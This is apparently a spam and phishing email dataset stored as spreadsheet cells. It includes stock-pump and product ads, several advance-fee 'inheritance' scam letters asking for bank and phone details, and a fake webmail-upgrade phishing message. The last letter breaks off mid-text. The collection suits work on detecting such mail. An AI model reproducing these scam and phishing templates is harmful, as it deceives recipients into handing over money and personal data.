    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  	 Preferred Non-Smoker  	  Just what the doctor ordered!	  	 Case Study #1	  Male - 63 $5,000,000 face Good Health 5-10 Cigarettes a day 	 Issued: Preferred Non-Smoker	  Case Study #2	  Female - 57 $785,000 face Good Health Social Cigarette Smoker	  Issued: Preferred Non-Smoker	  Case Study #3	  Male - 52 $5,200,000 face Good Health 1-2 Cigars a month	  Issued:Preferred Best Non-Smoker	  Case Study #4	  Male - 48 $1,000,000 face Private Pilot Smokes Cigars Daily 	 Issued: Preferred Non-Smoker without Aviation Flat Extra	  Click here to provide the details on your tobacco case!   Call the Doctor with your case details! We've cured 1,000s of agents' "tough cases!"  800-624-4502 - or - 	 Please fill out the form below for more information	  Name:	  	 	 E-mail:	  	 Phone:	  	 City:	  	State:	  	  	    	     Tennessee Brokerage Agency We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL]   Legal Notice   ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Preferred Non-Smoker Rates for Smokers =20 =20      =20            =20            =20            =20                 =20                    =20                       Case Study #1 =20                       Male - = 63                         $5,000,000 face                         Good Health                         5-10 Cigarettes a day  =20                       Issued: = Preferred Non-Smoker =20              =20                 =20                    =20                       Case Study #2 =20                       Female = - 57                         $785,000 face                         Good Health                         Social Cigarette Smoker =20                       Issued: = Preferred Non-Smoker =20           =20              =20                 =20                    =20                       Case Study #3 =20                       Male - 52                         $5,200,000 face                         Good Health                         1-2 Cigars a month =20                       Issued:Preferred Best = Non-Smoker =20              =20                 =20                    =20                       Case Study #4 =20                       Male - = 48                         $1,000,000 face                         Private Pilot                         Smokes Cigars Daily  =20                       Issued: = Preferred Non-Smoker without Aviation Flat = Extra =20            Call the Doctor with = your case details! We've cured 1,000s of = agents' "tough cases!" - or - =20           =20              =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                                          =20      We don't = want anyone to receive our mailings who does not=20 			wish to receive them. This is a professional communication=20 			sent to insurance professionals. To be removed from this mailing=20 			list, DO NOT REPLY to this message. Instead, go here: =20 			[URL]http://www.insuranceiq.com[/URL] Legal Notice =20 ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80--</t>
  </si>
  <si>
    <t>5803</t>
  </si>
  <si>
    <t>To: jyyhpbwoom@aa64.toplinequotes.com\nFrom: johnson11@aa64.toplinequotes.com\nDate: Tue, 3 Dec 2002 16:09:42 -0500</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 16:09:42 -0500</t>
  </si>
  <si>
    <t>johnson11@aa64.toplinequotes.com</t>
  </si>
  <si>
    <t>jyyhpbwoom@aa64.toplinequotes.com</t>
  </si>
  <si>
    <t>ADV: Free Mortgage Rate Quote mbvod</t>
  </si>
  <si>
    <t>Did you hear? Interest rates have just been lowered again. Don't delay! Get your free mortgage rate quote now and see how much you could save every month!\n    \nFree, no obligation quote:\n[URL]http://www.toplinequotes.com[/URL]\n                     \n                     \n                     \n                     \n                      \n---------------------------------------\nTo be removed, go to: \n[URL]http://www.toplinequotes.com[/URL]\nAllow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://www.toplinequotes.com http://www.toplinequotes.com</t>
  </si>
  <si>
    <t>4551</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "DESMOND STEVENS." &lt;desmondstevens@name.com&gt;\nDate: Tue, 3 Dec 2002 13:38:05 +0100</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 13:38:05 +0100</t>
  </si>
  <si>
    <t>"DESMOND STEVENS." &lt;desmondstevens@name.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] please kindly get back to me</t>
  </si>
  <si>
    <t>FROM:MR. DESMOND STEVENS\n\n                     URGENT ASSISTANCE. \nYOU MAY BE SURPRISED TO RECEIVE THIS LETTER FROM ME SINCE YOU DO NOT KNOW ME PERSONALLY. I AM MR.DESMOND STEVENS, THE FIRST SON OF DR. DENNIS STEVENS, WHO WAS RECENTLY MURDERED IN THE LAND DISPUTE IN ZIMBABWE. I WAS FURNISHED WITH VIABLE INFORMATION FROM THE WORLD TRADE CENTRE HERE IN AMSTERDAM, THE NETHERLANDS AND DECIDED TO WRITE YOU. \nBEFORE THE DEATH OF MY FATHER, HE HAD TAKEN ME TO AMSTERDAM TO DEPOSIT THE SUM OF TEN MILLION,FIVE HUNDRED THOUSAND UNITED STATES DOLLARS (US$10,500,000) IN A SECURITY COMPANY, AS IF HE FORESAW THE LOOMING DANGER IN ZIMBABWE. THIS MONEY WAS DEPOSITED IN A BOX AS GEMSTONES TO AVOID MUCH DEMURRAGE FROM THE SECURITY COMPANY. THIS AMOUNT WAS MEANT FOR THE PURCHASE OF NEW MACHINES AND CHEMICALS FOR THE FARMS AND ESTABLISHMENT OF NEW FARM IN SWAZILAND. THIS LAND PROBLEM CAME WHEN ZIMBABWE PRESIDENT MR. ROBERT MUGABE, INTRODUCED A NEW LAND ACT THAT WHOLLY AFFECTED RICH WHITE FARMERS AND SOME FEW BLACK FARMERS. THIS RESULTED TO THE KILLING AND MOB ACTION BY ZIMBABWE WAR VETERANS AND SOME LUNATICS IN THE SOCIETY. INFACT, A LOT OF PEOPLE WERE KILLED BECAUSE OF THIS LAND REFORM ACT OF WHICH MY FATHER WAS ONE OF THE VICTIMS. IT IS AGAINST THIS BACKGROUND THAT MY FAMILY AND I WHO ARE CURRENTLY STAYING IN AMSTERDAM DECIDED TO TRANSFER MY FATHERS MONEY TO \n A FOREIGN ACCOUNT. SINCE THE LAW OF THE NETHERLANDS PROHIBIT A REFUGEE (ASYLUM SEEKER) TO OPEN ANY ACCOUNT OR TO BE INVOLVED IN ANY FINANCIAL TRANSACTION. \nAS THE ELDEST SON OF MY FATHER, I AM SADDLED WITH THE RESPONSIBILITY OF SEEKING A GENUINE FOREIGN ACCOUNT WHERE THIS MONEY COULD BE TRANSFERRED WITHOUT THE KNOWLEDGE OF MY GOVERNMENT WHO ARE BENT ON TAKING EVERYTHING WE HAVE GOT. I AM FACED WITH THE DILEMMA OF INVESTING THIS AMOUNT OF MONEY IN THE NETHERLANDS FOR THE FEAR OF GOING THROUGH THE SAME EXPERIENCE IN FUTURE SINCE BOTH COUNTRIES HAVE SIMILAR HISTORY. MOREOVER, THE NETHERLANDS FOREIGN EXCHANGE POLICY DOES NOT ALLOW SUCH INVESTMENT FROM ASYLUM SEEKERS. AS A BUSINESSMAN, WHOM I HAVE ENTRUSTED MY FUTURE AND MY FAMILY IN HIS HANDS, I MUST LET YOU KNOW THAT THIS TRANSACTION IS RISK FREE. IF YOU ACCEPT TO ASSIST ME AND MY FAMILY, ALL I NEED YOU TO DO FOR ME IS TO MAKE ARRANGEMENT AND COME TO AMSTERDAM, THE NETHERLANDS SO THAT YOU CAN OPEN THE NON-RESIDENT ACCOUNT WHICH WILL AID US IN TRANSFERRING THE MONEY INTO ANY ACCOUNT YOU WILL NOMINATE OVERSEAS. THIS MONEY I INTEND TO USE FOR INVESTMENT. I HAVE\n  OPTIONS TO OFFER YOU, FIRST YOU CAN CHOOSE TO HAVE CERTAIN PERCENTAGE OF THE MONEY FOR NOMINATING YOUR ACCOUNT FOR THE TRANSACTION, OR YOU CAN GO INTO PARTNERSHIP WITH ME FOR A PROPER PROFITABLE INVESTMENT OF THE MONEY IN YOUR COUNTRY. WHICHEVER OPTION YOU CHOOSE, FEEL FREE TO NOTIFY ME. I HAVE MAPPED OUT 5% OF THIS MONEY FOR ALL EXPENSES INCURRED IN PROCESSING THIS TRANSACTION. IF YOU DO NOT PREFER A PARTNERSHIP, I AM WILLING TO GIVE YOU 25% OF THE MONEY WHILE THE REMAINING 70% THAT IS MEANT FOR ME, WILL BE FOR THE INVESTMENT IN YOUR COUNTRY. \nPLEASE, CONTACT ME WITH THE ABOVE TELEPHONE AND E-MAIL ADDRESS, WHILE I IMPLORE YOU TO MAINTAIN THE ABSOLUTE SECRECY REQUIRED IN THE TRANSACTION. \nYOURS FAITHFULLY, \nDESMOND STEVENS. \n\n\n\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>5802</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: "4544032@mcimail.com" &lt;alh4544032@mcimail.com&gt;\nDate: Tue, 3 Dec 2002 13:37:08 -0600</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 13:37:08 -0600</t>
  </si>
  <si>
    <t>"4544032@mcimail.com" &lt;alh4544032@mcimail.com&gt;</t>
  </si>
  <si>
    <t>NEW STOCK PICK: OUR LAST ONE--PICK UP 300%.............................................................................................................................................................................................. aufd iuju</t>
  </si>
  <si>
    <t>Dear jm@netnoteinc.com :\n\nDid you miss out on ENVC, UP 280%?, PRCT, UP 300%? HUMT, UP 200% and others?\n\nNOW What are you waiting for?\n\nHere's another pick - Another potential big Play\n\n\n\n![]([URL]http://www.geocities.com[/URL] |  \n\n**PLAY OF THE WEEK OTCBB: NNCO**  \n  \n---|---  \n**\n\n![]([URL]http://www.bloomberg.com[/URL]  \n\n** |   |  MicroCap Marketing PLAY OF THE WEEK  _for our  investors this_ week\nis NANNACO, INC.  (OTCBB: NNCO ).  If you tuned in to our last two picks, you\nwould have noticed that ,  PRCT went from a close of $.025 to a high of $0.12.\nThat's a 300% gain in just two days.  Our other  pick, HUMT, almost gained\nover 200%. PLAY OF THE WEEK tracks stocks on downward trends, foresees bottom\nand notify our subscribers of it potential upward movement.  We also look for\nnewly trading companies, and stocks that by comparing trading history and\nshares in the marketplace we believe have great levity upward.\n\nNNCO - Shares Outstanding **-CLICK HERE  \n** NNCO - Shares Traded **- CLICK HERE** **  \n**NNCO - Market Makers **  \-  CLICK HERE      **\n\n|\n\n**_Our Last  Plays_**\n\nPRCT **UP 300%**\n\nSYPY UP 310%\n\nIGTT UP 160%\n\nUP In Just 3-5 Days\n\n|\n\n                     \n\n_    MicroCap Marketing_ PLAYOF THE WEEK.  Our trademark is our uncanny\nability to spot stocks that have bottomed-out and anticipate their rebound and\nupward trend.  Most of the stocks we track rebound and peak within just two\ndays, giving investors opportunity to make a few bucks back in such a highly\nvolatile market.  We don't believe the market is such as to take any long-term\npositions right now.  But in a highly unstable marketplace, the opportunities\nfor short-term stabs (gains) are abundant.  When the question today seems to\nbe which way is up, we like to think that from the bottom there is no other\nway---it's all a matter of timing.  \n  \nIf you want to receive future Picks **click here**\n\nI no longer wish to receive your newsletter **click here**\n\nksxqtfdeqfehbhysh\n\n</t>
  </si>
  <si>
    <t>http://www.geocities.com http://www.bloomberg.com</t>
  </si>
  <si>
    <t>5804</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Professional_Career_Development_Institute@FrugalJoe.com\nDate: Tue, 3 Dec 2002 13:19:58 -0800</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 13:19:58 -0800</t>
  </si>
  <si>
    <t>Professional_Career_Development_Institute@FrugalJoe.com</t>
  </si>
  <si>
    <t>Busy? Home Study Makes Sense!</t>
  </si>
  <si>
    <t>\n\n  \n---  \n![]([URL]http://images.pcdi-homestudy.com[/URL]  \n| ![]([URL]http://images.pcdi-homestudy.com[/URL] |  |\n\n**Train Now With Self-Paced Home Study  \n**Thousands of people -- people just like you -- are able to work from home\nthanks to the convenience of distance learning courses from PCDI.  \n  \n**BONUS! $200 tuition discount when you enroll!  \n****  \n** | **PCDI** offers over 40 popular career training programs, including:  \n  \n|  |  Medical Transcription  \n---|---  \n|  Medical Billing  \n|  Electrician  \n|  Interior Decorating  \n|  Child Day Care  \n|  Private Investigation  \n|  And more!  \n  \n**High School Diploma.** Start where you left off in 9th - 12th grade.  \n![]([URL]http://images.pcdi-homestudy.com[/URL] |\n![]([URL]http://images.pcdi-homestudy.com[/URL] |\n![]([URL]http://images.pcdi-homestudy.com[/URL] | **Associate's\nDegree Programs.** Take your education further: earn your nationally\naccredited degree in  \n  \n|  |  Paralegal Studies  \n---|---  \n|  Criminal Justice  \n|  Early Childhood Education  \n|  Accounting  \n|  Health Care Management  \n|  Small Business Management  \n|  Human Resource Management  \n|  And more!  \n  \n**CLICK HERE NOW!** Order your FREE Career Information Kit. Enjoy a $200\ntuition savings when you enroll in any one of our nationally accredited\ncourses!  \n  \n![]([URL]http://images.pcdi-homestudy.com[/URL]  \n![]([URL]http://images.pcdi-homestudy.com[/URL]  \n  \n![]([URL]http://images.pcdi-homestudy.com[/URL]\n\n|  | **FREE home study career information kit  \n**PCDI's nationally accredited home study programs will fit into the busiest\nlifestyle -- without disrupting your work, family life, or leisure activities.  \n  \n|\n\n\n\n|\n\nComprehensive study materials are mailed to your home  \n  \n---|---  \n  \n\n\n|\n\nEnjoy self-paced lessons and open-book exams  \n  \n\n\n|\n\nAffordable, interest-free monthly tuition  \n  \n\n\n|\n\nNo commuting, no parking fees, no pressure!  \n  \n\n\n|\n\nReceive your diploma at graduation  \n  \n**  \n****Send for your FREE Career Information Kit now --** **CLICK HERE NOW!**\n**** Find out how you can study at home, work at home, and succeed!  \n![]([URL]http://images.pcdi-homestudy.com[/URL]  \n![]([URL]http://images.pcdi-homestudy.com[/URL]  \n  \n\n  \n![](dot.gif)  \n---  \n![]([URL]http://www.frugaljoe.com[/URL] | ![]([URL]http://www.frugaljoe.com[/URL]\n| __  \nYou have received this email because you have subscribed through one of our\nmarketing partners. If you would like to learn more about Frugaljoe.com then\nplease visit our website [URL]www.frugaljoe.com[/URL] If this message was sent to you in\nerror, or if you would like to unsubscribe please clickhere or cut and paste\nthe following link into a web browser:  \n[URL]http://www.frugaljoe.com[/URL]\~moc.cnietonten^^mj\~1754388\~12a1  \nThird-party advertisements, from lines, and subject lines contained in this\nemail are the sole responsibility of the advertiser.  \n  \n  \n  \n  \n![]([URL]http://www.330w.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://images.pcdi-homestudy.com http://www.frugaljoe.com http://www.frugaljoe.com www.frugaljoe.com http://www.frugaljoe.com http://www.330w.com</t>
  </si>
  <si>
    <t>5801</t>
  </si>
  <si>
    <t>To: yyyy@NETNOTEINC.COM\nFrom: Lose Weight &lt;LoseWeight@DIRECT4OPTIN.COM&gt;\nDate: Tue, 3 Dec 2002 11:20:16 -0500</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 11:20:16 -0500</t>
  </si>
  <si>
    <t>Lose Weight &lt;LoseWeight@DIRECT4OPTIN.COM&gt;</t>
  </si>
  <si>
    <t>yyyy@NETNOTEINC.COM</t>
  </si>
  <si>
    <t>Reverse Aging While Burning Fat</t>
  </si>
  <si>
    <t>![]([URL]http://track.direct4optin.com[/URL]  \n  \nThe following message was sent to you as an opt-in subscriber to eNetwork. We\nwill continue to bring you valuable offers on the products and services that\ninterest you most. If you wish to unsubscribe please click on the remove link\nat the bottom of the page.  \n  \n  \n**** |  **Human Growth Hormone Therapy**  \n---  \n  \n**Lose weight while building lean muscle mass**  \n**and reversing the ravages of aging all at once.**\n\nRemarkable discoveries about Human Growth Hormones ( **HGH** )  \nare changing the way we think about aging and weight loss.  \n**Lose Weight**  \n**Build Muscle Tone**  \n**Reverse Aging**  \n**Increased Libido**  \n**Duration Of Penile Erection** | **New Hair Growth**  \n**Improved Memory**  \n**Improved skin**  \n**New Hair Growth**  \n**Wrinkle Disappearance**  \n---|---  \n  \n**Visit Our Web Site and Lean The Facts: Click Here**  \n  \n  \n\n* * *\n\n  \n\nYou are receiving this email as a subscriber to our mailing list. To remove\nyourself from this and related email lists click here: UNSUBSCRIBE MY EMAIL\n\n  \nUnder Bill(s) 1618 TITLE III by the 105 US Congress, per Section 301,\nParagraph(a)(2)of S. 1618, a letter cannot be considered Spam if the sender\nincludes contact information and a method of "removal".  \n  \n  \n---  \n![]([URL]http://209.236.57.11[/URL]\n\n</t>
  </si>
  <si>
    <t>http://track.direct4optin.com http://209.236.57.11</t>
  </si>
  <si>
    <t>5798</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Omaha Steaks &lt;steakssgo37@SendGreatOffers.com&gt;\nDate: Tue, 3 Dec 2002 04:00:34 -0600</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 04:00:34 -0600</t>
  </si>
  <si>
    <t>Omaha Steaks &lt;steakssgo37@SendGreatOffers.com&gt;</t>
  </si>
  <si>
    <t>Get 12 free Burgers + 1/2 Price Omaha Steaks!</t>
  </si>
  <si>
    <t>\n\nThis message was not sent to you unsolicited. You received this email as a\nmember of **SendGreatOffers.com**.  \nUnsubscription instructions are at the bottom of the message  \n  \n---  \n|\n![]([URL]http://a725.g.akamai.net[/URL]  \n![]([URL]http://a725.g.akamai.net[/URL]|\n![]([URL]http://a725.g.akamai.net[/URL]  \n---|---  \n| **GIVE THE GIFT OF EXCEPTIONAL TASTE!**  \n---  \n![]([URL]http://a725.g.akamai.net[/URL]![]([URL]http://a725.g.akamai.net[/URL]  \n**SAVE 50% on these Best Sellers...**  \n**Prefer to order by phone? CALL 1.800.960.8400&amp; mention coupon code RZ3073.**  \n---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a725.g.akamai.net http://a725.g.akamai.net http://a725.g.akamai.net http://a725.g.akamai.net http://a725.g.akamai.net http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>1614</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ahmed Ali &lt;ahmed_al_benin@yahoo.co.uk&gt;\nDate: Tue, 29 Nov 2005 06:01:50 -0600</t>
  </si>
  <si>
    <t>Tue, 29 Nov 2005 06:01:50 -0600</t>
  </si>
  <si>
    <t>Ahmed Ali &lt;ahmed_al_benin@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>Business Proposal.</t>
  </si>
  <si>
    <t>\n\n\nGood day to you.\n\nI am Ahmed Ali the director in charge of Auditing and Accounting section\nof Bank of Africa Benin in West Africa,and also a special account officer\nof  Mr. Abel Faiza Bahar, a  Lebanese.He was a Seasoned Contractor with\nBenin Cement Company in Benin Republic., who unfortunately died in the\nplane crash of Union Transport Africaines Flight Boeing 727  in Cotonou,\nBenin republic on the december 26,2003.\n\nYou will read more stories about the crash on visiting this website:\n[URL]www.cnn.com[/URL]\n\nBefore his death on the 26th December 2003, Mr. Abel Faiza Bahar has a\nfixed deposit account with the bank and no other person knows about this\naccount or any thing concerning it, the account has no other beneficiary\nand my investigation proved to me that his supposed next of kin died along\nwith him in the crash. Since then I have made several enquiries to locate\nany of my clients extended relatives, this has also proved unsuccessful.\nAfter these several unsuccessful attempts, I decided to  contact you. I\ncontacted you to assist in repatriating the money left behind by my client\nbefore they get confiscated or declared unserviceable by the bank.\n\nConsequently, Since I have been unsuccessful in locating the relatives \nfor over 5 weeks now. I seek your consent to present you as the next of\nkin  of the deceased so that the proceeds of this account valued at\nUS$10.8 million can be paid to you and then you and me can share the\nmoney. 80% to me and 20% to you.I have all necessary legal documents that\ncan be used to back up any claim we may make. All I require is your honest\nco-operation to enable us see this deal through. I guarantee that this\nwill be executed under a legitimate arrangement that will protect you from\nany breach of the law. All documents of transaction will be destroyed\nimmediately we receive this money leaving no trace to any place.\n\nIf this proposal is acceptable to you, kindly email your following\ninformation to me:\n\na.Complete names\nb.Private telephone number\nc.Private fax number\nd.Private email\n\nUntil you write,have a nice day and God bless. You can also contact me via\nanother email:ah_ali_benin@yahoo.com\n\nSincerely,Ahmed Ali.\n\n\n</t>
  </si>
  <si>
    <t>3101</t>
  </si>
  <si>
    <t>To: nan\nFrom: hil frank022 &lt;hilfrank022@hotmail.fr&gt;\nDate: Tue, 29 May 2007 20:26:42 +0200</t>
  </si>
  <si>
    <t>Tue, 29 May 2007 20:26:42 +0200</t>
  </si>
  <si>
    <t>hil frank022 &lt;hilfrank022@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>From Frank Hilary.</t>
  </si>
  <si>
    <t>\n\n&gt;From Frank Hilary.\nAsylum Camp Abidjan .Address 102 rue Treichville.West Africa .\n                                        THIS IS CONFIDENTIAL PLEASE. My Dear, I am Frank Hilary from Sierra-Leone. I am an orphan being that I lost my late father a couple of years ago. My late father was one time director of GOLD and DIMOND / COCOA COMPANY exporting board until his death in One general hospital in my country Republic of SIERRA-LEONE. He was assassinated by the rebels following the political uprising. Before his death he had a foreign account in Côte d’Ivoire which he deposited sum of $15.000.000.00 USD dollars (Fifteen million United States dollars) This money is to open a new company in overseas which he told the bank was for the importation of cocoa processing machine. I want you to do me a favour to stand as the foreign business partner of my late father and receive these funds safely in your country or any safe place as the co-beneficiary of the funds. I have plans to do investment in your country withy the money. as it was the wish of my late father. like real estate and industrial production. This is my reason why I contact you for assistance. I have in mind to give you 15% of the total amount instantly as for your assistance before I go on with the proposed of investment in your country.  Please if you are willing to assist me and my only Sister, indicate your interest in replying soonest for more information’s, Thanks and God bless. Best regards. Frank Hilary. \n_________________________________________________________________\nExprimez-vous : créez la page d'accueil qui vous ressemble avec Live.com.\n[URL]http://www.live.com[/URL]</t>
  </si>
  <si>
    <t>283</t>
  </si>
  <si>
    <t>To: SI2003@kukamail.com &lt;SI2003@kukamail.com&gt;\nFrom: nan\nDate: Tue, 29 Jul 2003 12:24:28 -0000</t>
  </si>
  <si>
    <t>Tue, 29 Jul 2003 12:24:28 -0000</t>
  </si>
  <si>
    <t>SI2003@kukamail.com &lt;SI2003@kukamail.com&gt;</t>
  </si>
  <si>
    <t>\n\nDear Sir, \n\nI am Mr Steve Ibeto, the personal accounting officer to \nMr Williams Hales, a national of your country, who \nused to work with shell development company in \nNigeria. Here in after shall be referred to as my \nclient. \n\nOn the 21st of April 1999, my client, his wife And \ntheir three children were involved in a car accident \nalong sagbama express road. All occupants of the \nvehicle unfortunately lost there lives. Since then I \nhave made several enquiries to your embassy to locate \nany of my clients extended relatives this has also \nproved unsuccessful. \n\nAfter these several unsuccessful attempts, I decided \nto trace any of his relation but to all avail.After investigation,i discovered that his next of kin dead along with him during the accident Hence i have contacted you to act as his next of kin to assist in repartrating the money and property left behind by my client before they get confisicated or declared unserviceable by the bank where this huge deposits were lodged. \n\nParticularly,the Zenith International bank plc where the deceased had \nan account valued at about 5.5million dollars has \nissued me a notice as his accounting officer to \nprovide the next of kin or have the account \nconfisicated within the next ten official working \ndays. \n\n\nsince i have been unsuccesfull in locating the \nrelatives for over 2 years now i seek your consent to \npresent you as the next of kin of the deceased since \nyou have the same surname so that the proceeds of this \naccount valued at 5.5million dollars can be paid to \nyou and then you and me can share the money. I have \nall necessary legal documents that can be used to back \nup any claim we may make. All I require is your honest \ncooperation to enable us see this deal through. I \nguarantee that this will be executed under a \nlegitimate arrangement that will protect you from any \nbreach of the law. \n\nThanks and God Bless \n\nBest Regards. \n\nMr Steve Ibeto. \n\n \n\n___________________________________________________________\nKukamail.com - Free Email for the World!\nOpen your account here: [URL]http://www.kukamail.com[/URL]\n\n___________________________________________________________\nSPONSOR MESSAGE: \nGet Email @YOURFAMILY, @YOURBUSINESS, or @YOURDOMAIN\nVisit: [URL]http://www.entergroup.com[/URL] today!\n\n\n</t>
  </si>
  <si>
    <t>http://www.kukamail.com http://www.entergroup.com</t>
  </si>
  <si>
    <t>951</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: Webmail Upgrade &lt;Mailbox_service@consultant.com&gt;\nDate: Tue, 29 Jan 2019 11:57:18 +0530</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2019 11:57:18 +0530</t>
  </si>
  <si>
    <t>Webmail Upgrade &lt;Mailbox_service@consultant.com&gt;</t>
  </si>
  <si>
    <t>Email Service Announcement And Account Verification</t>
  </si>
  <si>
    <t>Dear jose    We are closing all old version of monkey.org due to upgrade in our server. Tap below to get a more organized mailbox to avoid being deactivated. Log in to the latest version  [URL]https://webmail.monkey.org[/URL]  monkey.org®  Support © 2019 s</t>
  </si>
  <si>
    <t>https://webmail.monkey.org</t>
  </si>
  <si>
    <t>2450</t>
  </si>
  <si>
    <t>To: nan\nFrom: sami yusuf &lt;yusuf_sami_025@hotmail.fr&gt;\nDate: Tue, 29 Aug 2006 04:23:49 +0200</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2006 04:23:49 +0200</t>
  </si>
  <si>
    <t>sami yusuf &lt;yusuf_sami_025@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>GOOD DAY SIR, PLZ REPLY ME SOONEST</t>
  </si>
  <si>
    <t>\nFROM THE DESK OF DR YUSUF SAMI.\nBILL AND EXCHANGE MANAGER\nFOREIGN REMITTANCE DEPT.\nBANK OF AFRICA(BOA)\nOUAGADOUGOU, BURKINA FASO.\n\n\n\n\nDear friend ,\n\nI am the manager of bill and exchange at FOREIGN REMITTANCE DEPT.BANK OF \nAFRICA(BOA)I am writing, following the impressive information about you \nthrough one of my friends who runs a consultancy firm in your country. He \nassured me of your capability and releability to champion this\nbusiness opportunity.\n\nIn my department we discovered an abandoned sum of U.S$10m US dollars (Ten \nMillion US dollars) in an account that belongs to one of our foreign \ncustomer who died along with his entire family on Monday,31 July, 2000,in a \nplane crash. Since we got information about his death, we have been \nexpecting his next of kin to come over and claim his money because we cannot \nrelease it unless\nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidlines and laws but unfortunately we learnt that \nall his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behind for the claim. It is therefore upon this\ndiscovery that I and other officials in my department now decided to make \nthis business proposal to you and release the money to you as the next of \nkin or relation to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the\nbank treasury as unclaimed bill. The banking law and guidline here \nstipulates that if such money\nremained unclaimed after four years, the money will be transfered into the \nbank treasury as unclaimed fund. The request of foreign as next of kin in \nthis business is occassioned by the fact that the customer was a foreigner \nand a Burkinabe cannot stand as next of kin to a foreigner.\n\nWe agree that 30% of this money will be for you as a foreign partner, in \nrespect to the provision of a foreign account, 5% will be set aside for \nexpenses incured during the business and 65% would be for me and my \ncolleagues. There after I and my colleagues will visit your country for \ndisbursement according to the percentages indicated.\n\nTherefore, to enable the immediate transfer of this fund to you as arranged, \nyou must apply first to the bank as relation or next of kin of the deceased \nindicating your bank name, your bank account number, your private telephone \nand fax number for easy and effective communication and location\nwherein the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or e-mail the text of \nthe application. I will not fail to bring to your notice that this \ntransaction is risk-free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer.\nYou should contact me immediately as soon as you receive this letter for \nmore explanations.\n\nYours faithfully,\nDR YUSUF SAMI.\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>159</t>
  </si>
  <si>
    <t>To: R@M &lt;R@M&gt;\nFrom: Oliveira Savimbi &lt;olisav@netscape.net&gt;\nDate: Tue, 29 Apr 2003 01:42:07 +0200</t>
  </si>
  <si>
    <t>Tue, 29 Apr 2003 01:42:07 +0200</t>
  </si>
  <si>
    <t>Oliveira Savimbi &lt;olisav@netscape.net&gt;</t>
  </si>
  <si>
    <t>R@M &lt;R@M&gt;</t>
  </si>
  <si>
    <t>PRIVATE EMAIL MESSAGE.</t>
  </si>
  <si>
    <t>Good day, \n\nThis email message requires your utmost confidentiality. \n\nIt is with warm heart I am offering you my friendship, and I hope this mail meets you in good time. I know this is a most unusual way to contact you as we have not met personally or had any dealings in the past, but I am humbly asking that you take due consideration of the importance of my proposal and the immense benefit in it for you. Also I duly apologize for infringing on your privacy, if this contact is not acceptable to you, as I make this proposal to you as a person of integrity. \n\nFirst and foremost I wish to introduce myself properly to you. My name is Oliveira Chuli Savimbi, I am a nephew and Personal Assistant to Late Jonas Malheiro Savimbi, leader of UNITA (National Union for the Total Independence of Angola). As led by my instinct, I selected your email address from an internet directory, in my intensive and desperate search for a partner, hence this email to you. I crave your indulgence to read this carefully, in order to have a general overview of my situation. \n\nMy Uncle was killed in a surprise attack by government troops of Angola, led by President Dos Santos, on Friday 22nd February 2002. After his death, Mr. Antonio Dembo who was his second in command, assumed office as leader of UNITA, due to the lack of the Charisma my Uncle had carried UNITA with in Dembo, there was chaos and struggle for leadership. Prominent members like Carlos Morgado lobbied to depose Dembo and assume leadership in order to enrich themselves and some of them who saw me as a threat to their ambitions, including Mr.Dembo, planned to kill me. The tension and confusion in UNITA become uncontrollable when Mr. Dembo died 10days after my Uncle's death. As I already lost my Uncle who is my mentor in this struggle that has been on for three decades now, not so much of the struggle interested me anymore, as there was no more sense of direction. I then desired a peaceful life, as I no more had interest in the war. For this reason, I secretly left Angola and came her!\n e \n(Holland) to seek for political asylum. \n\nI am sincerely proposing to you to render me your most needed assistance in respect to safekeeping of some of my Uncle's money that arose from Diamonds sales. This money (US$18.5million), which was already on its way to my Uncle's Swiss Bank account, through the Diplomatic means we use to move money abroad, and was on transit with a Private Security company here in Amsterdam, Holland in February last year when the tragic incident of my Uncle's death occurred. I then instructed the company to secure the safety deposit containing the money pending on further instructions from me. I have waited all this time for security reasons, and have now decided to act with your reliable assistance. As a matter of fact, the reason I came to Holland 